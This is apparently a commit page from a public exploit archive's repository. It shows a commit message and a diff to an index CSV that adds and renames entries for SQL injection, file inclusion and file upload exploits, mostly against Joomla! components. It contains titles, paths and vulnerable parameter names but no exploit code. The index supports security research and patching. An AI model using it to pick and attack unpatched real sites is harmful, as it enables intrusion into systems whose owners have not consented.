DB: 2017-01-10

5 new exploits

DirectAdmin 1.50.1 - Denial of Service

Joomla! Component 'com_menu' - SQL Injection
Joomla! Component com_menu - SQL Injection
Joomla! Component 'com_pcchess' - Local File Inclusion
Joomla! Component 'com_huruhelpdesk' - SQL Injection
Joomla! Component com_pcchess - Local File Inclusion
Joomla! Component huruhelpdesk - SQL Injection

Joomla! Component 'com_ca' - SQL Injection
Joomla! Component com_ca - SQL Injection

Joomla! Component 'com_education_classess' - SQL Injection
Joomla! Component education - SQL Injection

Joomla! Component 'com_Flashgames' - Local File Inclusion
Joomla! Component FlashGames 1.5.0 - Local File Inclusion
Joomla! Component 'com_cvmaker' - Local File Inclusion
Joomla! Component 'com_myfiles' - Local File Inclusion
Joomla! Component CV Maker 1.0 - Local File Inclusion
Joomla! Component My Files 1.0 - Local File Inclusion
Joomla! Component 'com_joommail' - Local File Inclusion
Joomla! Component 'com_memory' - Local File Inclusion
Joomla! Component JoomMail 1.0 - Local File Inclusion
Joomla! Component Memory Book 1.2 - Local File Inclusion

Joomla! Component 'com_diary' - Local File Inclusion
Joomla! Component Digital Diary 1.5.0 - Local File Inclusion

Joomla! Component 'com_jdrugstopics' - SQL Injection
Joomla! Component com_jdrugstopics - SQL Injection

Joomla! Component 'com_flexicontent' - Local File
Joomla! Component FLEXIcontent 1.5 - Local File Inclusion

Joomla! Component 'com_delicious' - Local File Inclusion
Joomla! Component Delicious Bookmarks 0.0.1 - Local File Inclusion

Joomla! Component 'com_manager' 1.5.3 - 'id' Parameter SQL Injection
Joomla! Component com_manager 1.5.3 - 'id' Parameter SQL Injection

Joomla! Component 'com_pandafminigames' - SQL Injection
Joomla! Component com_pandafminigames - SQL Injection

Joomla! Component 'com_caddy' - Exploit
Joomla! Component com_caddy - Exploit

Joomla! Component 'com_jesectionfinder' - Arbitrary File Upload
Joomla! Component com_jesectionfinder - Arbitrary File Upload

Joomla! Component 'com_camp' - SQL Injection
Joomla! Component com_camp - SQL Injection
Joomla! Component 'com_crowdsource' - SQL Injection
Joomla! Component 'com_event' - Multiple Vulnerabilities
Joomla! Component com_crowdsource - SQL Injection
Joomla! Component com_event - Multiple Vulnerabilities

Joomla! Component 'com_event' - SQL Injection
Joomla! Component com_event - SQL Injection

Joomla! Component 'com_packages' - SQL Injection
Joomla! Component com_packages - SQL Injection

Joomla! Component 'com_jepoll' - 'pollid' Parameter SQL Injection
Joomla! Component JE Poll - 'pollid' Parameter SQL Injection
Joomla! Component 'com_chronoconnectivity' - Blind SQL Injection
Joomla! Component 'com_chronocontact' - Blind SQL Injection
Joomla! Component ChronoConnectivity - Blind SQL Injection
Joomla! Component ChronoForms - Blind SQL Injection

Joomla! Component 'com_lead' - SQL Injection
Joomla! Component com_lead - SQL Injection

Joomla! Component 'com_cinema' - SQL Injection
Joomla! Component cinema - SQL Injection
Joomla! Component 'com_jstore' - SQL Injection
Joomla! Component 'com_jtickets' - SQL Injection
Joomla! Component 'com_jcommunity' - SQL Injection
Joomla! Component 'com_jmarket' - SQL Injection
Joomla! Component 'com_jsubscription' - SQL Injection
Joomla! Component com_jstore - SQL Injection
Joomla! Component com_jtickets - SQL Injection
Joomla! Component com_jcommunity - SQL Injection
Joomla! Component com_jmarket - SQL Injection
Joomla! Component com_jsubscription - SQL Injection

Joomla! Component 'com_jnewsletter' - SQL Injection
Joomla! Component com_jnewsletter - SQL Injection

Joomla! Component 'com_joomdocs' - Cross-Site Scripting
Joomla! Component com_joomdocs - Cross-Site Scripting
Joomla! Component 'com_community' - Persistent Cross-Site Scripting
Joomla! Component 'com_jomestate' - Remote File Inclusion
Joomla! Component com_community - Persistent Cross-Site Scripting
Joomla! Component com_jomestate - Remote File Inclusion

Joomla! Component 'com_jejob' - Local File Inclusion
Joomla! Component com_jejob - Local File Inclusion

Joomla! Component 'com_dateconverter' 0.1 - SQL Injection
Joomla! Component com_dateconverter 0.1 - SQL Injection

Joomla! Component 'com_phocagallery' - SQL Injection
Joomla! Component Phoca Gallery 2.7.3 - SQL Injection

Joomla! Component 'com_jpodium' - SQL Injection
Joomla! Component JPodium 2.7.3 - SQL Injection

Joomla! Component 'com_jomtube' - 'user_id' Parameter Blind SQL Injection
Joomla! Component com_jomtube - 'user_id' Parameter Blind SQL Injection
Joomla! Component 'com_myhome' - Blind SQL Injection
Joomla! Component 'com_mysms' - Arbitrary File Upload
Joomla! Component MyHome - Blind SQL Injection
Joomla! Component MySMS - Arbitrary File Upload

Joomla! Component 'com_iproperty' - SQL Injection
Joomla! Component com_iproperty - SQL Injection

Joomla! Component 'com_itarmory' - SQL Injection
Joomla! Component com_itarmory - SQL Injection

Joomla! Component 'com_neorecruit' 1.4 - SQL Injection
Joomla! Component NeoRecruit 1.4 - SQL Injection

Joomla! Component 'com_equipment' - SQL Injection
Joomla! Component com_equipment - SQL Injection
Joomla! Component 'com_Fabrik' - SQL Injection
Joomla! Component 'com_extcalendar' - Blind SQL Injection
Joomla! Component Fabrik - SQL Injection
Joomla! Component com_extcalendar - Blind SQL Injection

Joomla! Component 'com_jejob' - SQL Injection
Joomla! Component JE Job - SQL Injection

Joomla! Component 'com_jfuploader' < 2.12 - Arbitrary File Upload
Joomla! Component com_jfuploader < 2.12 - Arbitrary File Upload
Joomla! Component 'com_connect' - Local File Inclusion
Joomla! Component 'com_dcnews' - Local File Inclusion
Joomla! Component com_connect - Local File Inclusion
Joomla! Component com_dcnews - Local File Inclusion

Joomla! Component 'com_clan' - SQL Injection
Joomla! Component com_clan - SQL Injection

Joomla! Component 'com_clanlist' - SQL Injection
Joomla! Component com_clanlist - SQL Injection
Joomla! Component 'com_markt' - SQL Injection
Joomla! Component 'com_img' - Local File Inclusion
Joomla! Component com_markt - SQL Injection
Joomla! Component com_img - Local File Inclusion

Joomla! Component 'com_ccboard' 1.2-RC - Multiple Vulnerabilities
Joomla! Component CCBoard 1.2-RC - Multiple Vulnerabilities

Joomla! Component 'com_maianmedia' - SQL Injection
Joomla! Component com_maianmedia - SQL Injection

Joomla! Component 'com_idoblog' - SQL Injection
Joomla! Component com_idoblog - SQL Injection

Joomla! Component 'com_people' 1.0.0 - SQL Injection
Joomla! Component People 1.0.0 - SQL Injection

Joomla! Component 'com_people' 1.0.0 - Local File Inclusion
Joomla! Component com_people 1.0.0 - Local File Inclusion

Joomla! Component 'com_jce' - Blind SQL Injection
Joomla! Component joomlacontenteditor - Blind SQL Injection

Joomla! Component 'com_hello' - SQL Injection
Joomla! Component com_hello - SQL Injection

Joomla! Component 'com_jdownloads' 1.0 - Arbitrary File Upload
Joomla! Component jDownloads 1.0 - Arbitrary File Upload

Joomla! Component 'com_jesubmit' - Local File Inclusion
Joomla! Component JE Story Submit - Local File Inclusion

Joomla! Component 'com_obSuggest' - Local File Inclusion
Joomla! Component obSuggest - Local File Inclusion

Joomla! Component 'com_jdirectory' - SQL Injection
Joomla! Component com_jdirectory - SQL Injection

Joomla! Component 'com_esearch' - SQL Injection
Joomla! Component Search 3.0.0 - SQL Injection

Joomla! Component 'com_joomtouch' - Local File Inclusion
Joomla! Component JoomTouch 1.0.2 - Local File Inclusion

Joomla! Component 'com_jce' 2.0.10 - Multiple Vulnerabilities
Joomla! Component joomlacontenteditor 2.0.10 - Multiple Vulnerabilities

Joomla! Component 'com_horses' - 'id' Parameter SQL Injection
Joomla! Component com_horses - 'id' Parameter SQL Injection

Joomla! Component 'com_galleryxml' 1.1 - SQL Injection / Local File Inclusion
Joomla! Component Gallery XML 1.1 - SQL Injection / Local File Inclusion

Joomla! Component 'com_jigsaw' - 'Controller' Parameter Directory Traversal
Joomla! Component com_jigsaw - 'Controller' Parameter Directory Traversal

Joomla! Component 'com_fireboard' - 'Itemid' Parameter SQL Injection
Joomla! Component com_fireboard - 'Itemid' Parameter SQL Injection

Joomla! Component 'com_dirfrm' - Multiple SQL Injections
Joomla! Component com_dirfrm - Multiple SQL Injections

Joomla! Component 'com_catalogue' - SQL Injection / Local File Inclusion
Joomla! Component Catalogue - SQL Injection / Local File Inclusion
Joomla! Component 'com_jeformcr' - 'id' Parameter SQL Injection
Joomla! Component 'com_jesectionfinder' - 'sf_id' Parameter SQL Injection
Joomla! Component Jeformcr - 'id' Parameter SQL Injection
Joomla! Component JExtensions Property Finder - 'sf_id' Parameter SQL Injection

Joomla! Component 'com_mailto' - Multiple Cross-Site Scripting Vulnerabilities
Joomla! Component com_mailto - Multiple Cross-Site Scripting Vulnerabilities

Joomla! Component 'com_classified' - SQL Injection
Joomla! Component Classified - SQL Injection

Joomla! Component 'com_frontenduseraccess' - Local File Inclusion
Joomla! Component com_frontenduseraccess - Local File Inclusion

Joomla! Component 'com_clan_members' - 'id' Parameter SQL Injection
Joomla! Component com_clan_members - 'id' Parameter SQL Injection

Joomla! Component 'com_phocadownload' - Local File Inclusion
Joomla! Component com_phocadownload - Local File Inclusion

Joomla! Component 'com_cbcontact' - 'contact_id' Parameter SQL Injection
Joomla! Component com_cbcontact - 'contact_id' Parameter SQL Injection

Joomla! Component 'com_maplocator' - 'cid' Parameter SQL Injection
Joomla! Component Map Locator - 'cid' Parameter SQL Injection

Joomla! Component 'com_ccboard' - SQL Injection / Arbitrary File Upload
Joomla! Component CCBoard - SQL Injection / Arbitrary File Upload

Joomla! Component 'com_morfeoshow' - 'idm' Parameter SQL Injection
Joomla! Component com_morfeoshow - 'idm' Parameter SQL Injection

Joomla! Component 'com_jr_tfb' - 'Controller' Parameter Local File Inclusion
Joomla! Component com_jr_tfb - 'Controller' Parameter Local File Inclusion
Joomla! Component 'com_foto' - 'id_categoria' Parameter SQL Injection
Joomla! Component 'com_juicy' - 'picId' Parameter SQL Injection
Joomla! Component 'com_hospital' - SQL Injection
Joomla! Component 'com_controller' - 'Itemid' Parameter SQL Injection
Joomla! Component Foto - 'id_categoria' Parameter SQL Injection
Joomla! Component Juicy Gallery - 'picId' Parameter SQL Injection
Joomla! Component com_hospital - SQL Injection
Joomla! Component Controller - 'Itemid' Parameter SQL Injection

Joomla! Component 'com_newssearch' - SQL Injection
Joomla! Component com_newssearch - SQL Injection

Joomla! Component 'com_community' - 'userid' Parameter SQL Injection
Joomla! Component com_community - 'userid' Parameter SQL Injection

Joomla! Component 'com_biitatemplateshop' - 'groups' Parameter SQL Injection
Joomla! Component Biitatemplateshop - 'groups' Parameter SQL Injection

Joomla! Component 'com_expedition' - 'id' Parameter SQL Injection
Joomla! Component com_expedition - 'id' Parameter SQL Injection

Joomla! Component 'com_br' - 'state_id' Parameter SQL Injection
Joomla! Component com_br - 'state_id' Parameter SQL Injection

Joomla! Component 'com_caproductprices' - 'id' Parameter SQL Injection
Joomla! Component com_caproductprices - 'id' Parameter SQL Injection

Joomla! Component 'com_br' - 'Controller' Parameter Local File Inclusion
Joomla! Component com_br - 'Controller' Parameter Local File Inclusion

Joomla! Component 'com_full' - 'id' Parameter SQL Injection
Joomla! Component Full - 'id' Parameter SQL Injection
Joomla! Component 'com_boss' - 'Controller' Parameter Local File Inclusion
Joomla! Component 'com_car' - Multiple SQL Injections
Joomla! Component com_boss - 'Controller' Parameter Local File Inclusion
Joomla! Component com_car - Multiple SQL Injections

Joomla! Component 'com_bulkenquery' - 'Controller' Parameter Local File Inclusion
Joomla! Component com_bulkenquery - 'Controller' Parameter Local File Inclusion

Joomla! Component 'com_jesubmit' - 'index.php' Arbitrary File Upload
Joomla! Component JE Story Submit - 'index.php' Arbitrary File Upload

Joomla! Component 'com_motor' - 'cid' Parameter SQL Injection
Joomla! Component com_motor - 'cid' Parameter SQL Injection
Joomla! Component 'com_firmy' - 'Id' Parameter SQL Injection
Joomla! Component 'com_crhotels' - 'catid' Parameter SQL Injection
Joomla! Component com_firmy - 'Id' Parameter SQL Injection
Joomla! Component com_crhotels - 'catid' Parameter SQL Injection

Joomla! Component 'com_cmotour' - 'id' Parameter SQL Injection
Joomla! Component com_cmotour - 'id' Parameter SQL Injection

Joomla! Component 'com_bnf' - 'seccion_id' Parameter SQL Injection
Joomla! Component com_bnf - 'seccion_id' Parameter SQL Injection

Joomla! Component 'com_machine' - Multiple SQL Injections
Joomla! Component Machine - Multiple SQL Injections

Joomla! Component 'com_joomsport' - SQL Injection / Arbitrary File Upload
Joomla! Component Joomsport - SQL Injection / Arbitrary File Upload

Joomla! Component 'com_dv' - 'upload.php' Arbitrary File Upload
Joomla! Component DentroVideo 1.2 - 'upload.php' Arbitrary File Upload

Joomla! Component 'com_hwdvideoshare' - 'flash_upload.php' Arbitrary File Upload
Joomla! Component hwdVideoShare - 'flash_upload.php' Arbitrary File Upload
Joomla! Component 'com_maianmedia' - 'uploadhandler.php' Arbitrary File Upload
Joomla! Component 'com_jcalpro' - SQL Injection
Joomla! Component Maian Media - 'uploadhandler.php' Arbitrary File Upload
Joomla! Component JCal Pro Calendar - SQL Injection

Joomla! Component 'com_hello' - 'Controller' Parameter Local File Inclusion
Joomla! Component com_hello - 'Controller' Parameter Local File Inclusion

Joomla! Component 'com_odudeprofile' - 'profession' Parameter SQL Injection
Joomla! Component Odudeprofile 2.8 - 'profession' Parameter SQL Injection

Joomla! Component 'com_civicrm' - Multiple Arbitrary File Upload Vulnerabilities
Joomla! Component CiviCRM - Multiple Arbitrary File Upload Vulnerabilities

Joomla! Component 'com_parcoauto' - 'idVeicolo' Parameter SQL Injection
Joomla! Component Parcoauto - 'idVeicolo' Parameter SQL Injection

Joomla! Component 'com_jvideoclip' - 'uid' Parameter SQL Injection
Joomla! Component JVideoClip 1.5.1 - 'uid' Parameter SQL Injection

Joomla! Component 'com_maian15' - 'name' Parameter Arbitrary File Upload
Joomla! Component Maian15 - 'name' Parameter Arbitrary File Upload

Joomla! Component 'com_inneradmission' - 'index.php' SQL Injection
Joomla! Component Inneradmission - 'index.php' SQL Injection

Joomla! Component 'com_easy_youtube_gallery' 1.0.2 - SQL Injection
Joomla! Component Easy Youtube Gallery 1.0.2 - SQL Injection

Joomla! Component 'com_payplans' 3.3.6 - SQL Injection
Joomla! Component com_payplans 3.3.6 - SQL Injection

Joomla! Component 'com_enmasse' 5.1 < 6.4 - SQL Injection
Joomla! Component com_enmasse 5.1 < 6.4 - SQL Injection

Joomla! Component 'com_bt_media' - SQL Injection
Joomla! Component com_bt_media 1.0 - SQL Injection

Joomla! Component 'com_guru' - SQL Injection
Joomla! Component Guru Pro - SQL Injection

DirectAdmin 1.50.1 - Denial of Service
Splunk 6.1.1 - 'Referer' Header Cross-Site Scripting
My Link Trader 1.1 - Authentication Bypass
My Php Dating 2.0 - 'path' Parameter SQL Injection
My Php Dating 2.0 - 'id' Parameter SQL Injection
This commit is contained in:
Offensive Security 2017-01-10 05:01:19 +00:00
parent a1c336773a
commit 574c0f2df8
8 changed files with 235 additions and 132 deletions

264
files.csv
View file

@ -5334,6 +5334,7 @@ id,file,description,date,author,platform,type,port
40965,platforms/windows/dos/40965.py,"FTPShell Server 6.36 - '.csv' Local Denial of Service",2016-12-26,"sultan albalawi",windows,dos,0
40985,platforms/linux/dos/40985.txt,"QNAP NAS Devices - Heap Overflow",2017-01-02,bashis,linux,dos,0
40994,platforms/multiple/dos/40994.html,"Brave Browser 1.2.16/1.9.56 - Address Bar URL Spoofing",2017-01-08,"Aaditya Purani",multiple,dos,0
40996,platforms/php/dos/40996.txt,"DirectAdmin 1.50.1 - Denial of Service",2017-01-08,"IeDb ir",php,dos,0
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@ -22784,7 +22785,7 @@ id,file,description,date,author,platform,type,port
12006,platforms/php/webapps/12006.txt,"Simple Calculator by Peter Rekdal Sunde - Arbitrary File Upload",2010-04-01,indoushka,php,webapps,0
12007,platforms/php/webapps/12007.txt,"SimpNews 2.16.2 - Multiple SQL Injections",2010-04-01,NoGe,php,webapps,0
12009,platforms/php/webapps/12009.html,"CMS Made Simple 1.7 - Cross-Site Request Forgery",2010-04-02,"pratul agrawal",php,webapps,0
12015,platforms/php/webapps/12015.txt,"Joomla! Component 'com_menu' - SQL Injection",2010-04-02,"DevilZ TM",php,webapps,0
12015,platforms/php/webapps/12015.txt,"Joomla! Component com_menu - SQL Injection",2010-04-02,"DevilZ TM",php,webapps,0
12016,platforms/php/webapps/12016.txt,"Joomla! Component com_ops - SQL Injection",2010-04-02,"DevilZ TM",php,webapps,0
12017,platforms/php/webapps/12017.txt,"Joomla! Component com_football - SQL Injection",2010-04-02,"DevilZ TM",php,webapps,0
12018,platforms/php/webapps/12018.txt,"DynPG CMS 4.1.0 - popup.php / counter.php Multiple Vulnerabilities",2010-04-02,eidelweiss,php,webapps,0
@ -22854,8 +22855,8 @@ id,file,description,date,author,platform,type,port
12118,platforms/php/webapps/12118.txt,"Joomla! Component PowerMail Pro 1.5.3 - Local File Inclusion",2010-04-09,AntiSecurity,php,webapps,0
12120,platforms/php/webapps/12120.txt,"Joomla! Component Foobla Suggestions 1.5.1.2 - Local File Inclusion",2010-04-09,"Chip d3 bi0s",php,webapps,0
12121,platforms/php/webapps/12121.txt,"Joomla! Component JA Voice 2.0 - Local File Inclusion",2010-04-09,kaMtiEz,php,webapps,0
12123,platforms/php/webapps/12123.txt,"Joomla! Component 'com_pcchess' - Local File Inclusion",2010-04-09,team_elite,php,webapps,0
12124,platforms/php/webapps/12124.txt,"Joomla! Component 'com_huruhelpdesk' - SQL Injection",2010-04-09,bumble_be,php,webapps,0
12123,platforms/php/webapps/12123.txt,"Joomla! Component com_pcchess - Local File Inclusion",2010-04-09,team_elite,php,webapps,0
12124,platforms/php/webapps/12124.txt,"Joomla! Component huruhelpdesk - SQL Injection",2010-04-09,bumble_be,php,webapps,0
12128,platforms/php/webapps/12128.txt,"GarageSales - Arbitrary File Upload",2010-04-09,saidinh0,php,webapps,0
12132,platforms/php/webapps/12132.pl,"Joomla! Component Agenda Address Book 1.0.1 - 'id' Parameter SQL Injection",2010-04-09,v3n0m,php,webapps,0
12133,platforms/multiple/webapps/12133.txt,"Asset Manager 1.0 - Arbitrary File Upload",2010-04-09,"Shichemt Alen and NeT_Own3r",multiple,webapps,0
@ -22863,7 +22864,7 @@ id,file,description,date,author,platform,type,port
12135,platforms/php/webapps/12135.txt,"mygamingladder MGL Combo System 7.5 - SQL Injection",2010-04-10,"Easy Laster",php,webapps,0
12136,platforms/php/webapps/12136.txt,"Joomla! Component Real Estate Property 3.1.22-03 - 'aid' Parameter SQL Injection",2010-04-10,c4uR,php,webapps,0
12137,platforms/php/webapps/12137.txt,"Joomla! Component allvideos - Blind SQL Injection",2010-04-10,bumble_be,php,webapps,0
12138,platforms/php/webapps/12138.txt,"Joomla! Component 'com_ca' - SQL Injection",2010-04-10,DigitALL,php,webapps,0
12138,platforms/php/webapps/12138.txt,"Joomla! Component com_ca - SQL Injection",2010-04-10,DigitALL,php,webapps,0
12139,platforms/php/webapps/12139.txt,"Kiasabz Article News CMS Magazine - SQL Injection",2010-04-10,indoushka,php,webapps,0
12140,platforms/php/webapps/12140.php,"xBtiTracker - SQL Injection",2010-04-11,InATeam,php,webapps,0
12141,platforms/php/webapps/12141.txt,"MediaInSpot CMS - Local File Inclusion (1)",2010-04-11,"Amoo Arash",php,webapps,0
@ -22877,7 +22878,7 @@ id,file,description,date,author,platform,type,port
12149,platforms/php/webapps/12149.txt,"Joomla! Component 'com_spsnewsletter' - Local File Inclusion",2010-04-11,AntiSecurity,php,webapps,0
12150,platforms/php/webapps/12150.txt,"Joomla! Component AlphaUserPoints 1.5.5 - Local File Inclusion",2010-04-11,AntiSecurity,php,webapps,0
12151,platforms/php/webapps/12151.txt,"Joomla! Component TRAVELbook 1.0.1 - Local File Inclusion",2010-04-11,AntiSecurity,php,webapps,0
12153,platforms/php/webapps/12153.txt,"Joomla! Component 'com_education_classess' - SQL Injection",2010-04-11,bumble_be,php,webapps,0
12153,platforms/php/webapps/12153.txt,"Joomla! Component education - SQL Injection",2010-04-11,bumble_be,php,webapps,0
12155,platforms/php/webapps/12155.txt,"AuroraGPT 4.0 - Remote Code Execution",2010-04-11,"Amoo Arash",php,webapps,0
12157,platforms/php/webapps/12157.txt,"OnePC mySite Management Software - SQL Injection",2010-04-11,Valentin,php,webapps,0
12158,platforms/php/webapps/12158.py,"Elite Gaming Ladders 3.5 - (match) SQL Injection",2010-04-11,"Easy Laster",php,webapps,0
@ -22889,23 +22890,23 @@ id,file,description,date,author,platform,type,port
12166,platforms/php/webapps/12166.txt,"Joomla! Component Web TV 1.0 - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
12167,platforms/php/webapps/12167.txt,"Joomla! Component Horoscope 1.5.0 - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
12168,platforms/php/webapps/12168.txt,"Joomla! Component Arcade Games 1.0 - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
12169,platforms/php/webapps/12169.txt,"Joomla! Component 'com_Flashgames' - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
12169,platforms/php/webapps/12169.txt,"Joomla! Component FlashGames 1.5.0 - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
12170,platforms/php/webapps/12170.txt,"Joomla! Component Address Book 1.5.0 - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
12171,platforms/php/webapps/12171.txt,"Joomla! Component Advertising 0.25 - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
12172,platforms/php/webapps/12172.txt,"Joomla! Component 'com_cvmaker' - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
12173,platforms/php/webapps/12173.txt,"Joomla! Component 'com_myfiles' - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
12172,platforms/php/webapps/12172.txt,"Joomla! Component CV Maker 1.0 - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
12173,platforms/php/webapps/12173.txt,"Joomla! Component My Files 1.0 - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
12174,platforms/php/webapps/12174.txt,"Joomla! Component Online Exam 1.5.0 - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
12175,platforms/php/webapps/12175.txt,"Joomla! Component 'com_joommail' - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
12176,platforms/php/webapps/12176.txt,"Joomla! Component 'com_memory' - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
12175,platforms/php/webapps/12175.txt,"Joomla! Component JoomMail 1.0 - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
12176,platforms/php/webapps/12176.txt,"Joomla! Component Memory Book 1.2 - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
12177,platforms/php/webapps/12177.txt,"Joomla! Component Online Market 2.x - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
12178,platforms/php/webapps/12178.txt,"Joomla! Component 'com_diary' - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
12178,platforms/php/webapps/12178.txt,"Joomla! Component Digital Diary 1.5.0 - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
12179,platforms/php/webapps/12179.txt,"FusionForge 5.0 - Multiple Remote File Inclusion",2010-04-12,cr4wl3r,php,webapps,0
12180,platforms/php/webapps/12180.txt,"Joomla! Component 'com_worldrates' - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
12181,platforms/php/webapps/12181.txt,"Joomla! Component 'com_record' - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
12182,platforms/php/webapps/12182.txt,"Joomla! Component Sweetykeeper 1.5 - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
12183,platforms/php/webapps/12183.txt,"Joomla! Component 'com_jdrugstopics' - SQL Injection",2010-04-12,SadHaCkEr,php,webapps,0
12183,platforms/php/webapps/12183.txt,"Joomla! Component com_jdrugstopics - SQL Injection",2010-04-12,SadHaCkEr,php,webapps,0
12184,platforms/php/webapps/12184.txt,"Joomla! Component SermonSpeaker - SQL Injection",2010-04-12,SadHaCkEr,php,webapps,0
12185,platforms/php/webapps/12185.txt,"Joomla! Component 'com_flexicontent' - Local File",2010-04-12,eidelweiss,php,webapps,0
12185,platforms/php/webapps/12185.txt,"Joomla! Component FLEXIcontent 1.5 - Local File Inclusion",2010-04-12,eidelweiss,php,webapps,0
12187,platforms/php/webapps/12187.txt,"Vieassociative Openmairie 1.01 Beta - (Remote File Inclusion / Local File Inclusion) Multiple File Inclusion",2010-04-12,cr4wl3r,php,webapps,0
12190,platforms/php/webapps/12190.txt,"Joomla! Component Jvehicles 1.0/2.0 - 'aid' Parameter SQL Injection",2010-04-13,"Don Tukulesto",php,webapps,0
12191,platforms/php/webapps/12191.txt,"Joomla! Component JP Jobs 1.2.0 - 'id' Parameter SQL Injection",2010-04-13,v3n0m,php,webapps,0
@ -22934,7 +22935,7 @@ id,file,description,date,author,platform,type,port
12234,platforms/php/webapps/12234.txt,"Joomla! Component Media Mall Factory 1.0.4 - Blind SQL Injection",2010-04-14,AntiSecurity,php,webapps,0
12235,platforms/php/webapps/12235.txt,"Joomla! Component Love Factory 1.3.4 - Local File Inclusion",2010-04-14,AntiSecurity,php,webapps,0
12236,platforms/php/webapps/12236.txt,"Joomla! Component JA Comment - Local File Inclusion",2010-04-14,AntiSecurity,php,webapps,0
12237,platforms/php/webapps/12237.txt,"Joomla! Component 'com_delicious' - Local File Inclusion",2010-04-14,AntiSecurity,php,webapps,0
12237,platforms/php/webapps/12237.txt,"Joomla! Component Delicious Bookmarks 0.0.1 - Local File Inclusion",2010-04-14,AntiSecurity,php,webapps,0
12238,platforms/php/webapps/12238.txt,"Joomla! Component Deluxe Blog Factory 1.1.2 - Local File Inclusion",2010-04-14,AntiSecurity,php,webapps,0
12239,platforms/php/webapps/12239.txt,"Joomla! Component BeeHeard 1.0 - Local File Inclusion",2010-04-14,AntiSecurity,php,webapps,0
12241,platforms/php/webapps/12241.txt,"Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities",2010-04-14,eidelweiss,php,webapps,0
@ -22945,14 +22946,14 @@ id,file,description,date,author,platform,type,port
12251,platforms/php/webapps/12251.php,"Camiro-CMS_beta-0.1 - 'FCKeditor' Arbitrary File Upload",2010-04-15,eidelweiss,php,webapps,0
12254,platforms/php/webapps/12254.txt,"FCKEditor Core - (FileManager test.html) Arbitrary File Upload (1)",2010-04-16,Mr.MLL,php,webapps,0
12256,platforms/php/webapps/12256.txt,"ilchClan 1.0.5B - SQL Injection",2010-04-16,"Easy Laster",php,webapps,0
12257,platforms/php/webapps/12257.txt,"Joomla! Component 'com_manager' 1.5.3 - 'id' Parameter SQL Injection",2010-04-16,"Islam DefenDers Mr.HaMaDa",php,webapps,0
12257,platforms/php/webapps/12257.txt,"Joomla! Component com_manager 1.5.3 - 'id' Parameter SQL Injection",2010-04-16,"Islam DefenDers Mr.HaMaDa",php,webapps,0
12260,platforms/php/webapps/12260.txt,"SIESTTA 2.0 - Local File Inclusion / Cross-Site Scripting",2010-04-16,JosS,php,webapps,0
12262,platforms/php/webapps/12262.php,"Zyke CMS 1.1 - (Authentication Bypass) SQL Injection",2010-04-16,"Giuseppe 'giudinvx' D'Inverno",php,webapps,0
12266,platforms/php/webapps/12266.txt,"60 cycleCMS 2.5.2 - Cross-Site Request Forgery (Change 'Username' and Password)",2010-04-16,EL-KAHINA,php,webapps,0
12267,platforms/php/webapps/12267.txt,"WebAdmin - Arbitrary File Upload",2010-04-16,DigitALL,php,webapps,0
12268,platforms/php/webapps/12268.txt,"Uploader 0.7 - Arbitrary File Upload",2010-04-16,DigitALL,php,webapps,0
12269,platforms/php/webapps/12269.txt,"Joomla! Component JoltCard 1.2.1 - SQL Injection",2010-04-16,Valentin,php,webapps,0
12270,platforms/php/webapps/12270.txt,"Joomla! Component 'com_pandafminigames' - SQL Injection",2010-04-16,Valentin,php,webapps,0
12270,platforms/php/webapps/12270.txt,"Joomla! Component com_pandafminigames - SQL Injection",2010-04-16,Valentin,php,webapps,0
12272,platforms/php/webapps/12272.txt,"PHP RapidKill Pro 5.x - Arbitrary File Upload",2010-04-17,DigitALL,php,webapps,0
12276,platforms/php/webapps/12276.txt,"Redaxo 4.2.1 - Remote File Inclusion",2010-04-18,eidelweiss,php,webapps,0
12277,platforms/php/webapps/12277.txt,"Openscrutin 1.03 - (Remote File Inclusion / Local File Inclusion) Multiple File Inclusion",2010-04-18,cr4wl3r,php,webapps,0
@ -22991,7 +22992,7 @@ id,file,description,date,author,platform,type,port
12333,platforms/php/webapps/12333.txt,"cms (id) 5.0 - SQL Injection",2010-04-22,spykit,php,webapps,0
12338,platforms/php/webapps/12338.txt,"Cacti 0.8.7e - SQL Injection",2010-04-22,"Nahuel Grisolia",php,webapps,0
12339,platforms/php/webapps/12339.txt,"Cacti 0.8.7e - OS Command Injection",2010-04-22,"Nahuel Grisolia",php,webapps,0
12340,platforms/php/webapps/12340.txt,"Joomla! Component 'com_caddy' - Exploit",2010-04-22,_SuBz3r0_,php,webapps,0
12340,platforms/php/webapps/12340.txt,"Joomla! Component com_caddy - Exploit",2010-04-22,_SuBz3r0_,php,webapps,0
12345,platforms/php/webapps/12345.txt,"phpGreetCards 3.7 - Cross-Site Scripting",2010-04-22,Valentin,php,webapps,0
12346,platforms/php/webapps/12346.txt,"AJ Matrix 3.1 - 'id' Multiple SQL Injection",2010-04-22,v3n0m,php,webapps,0
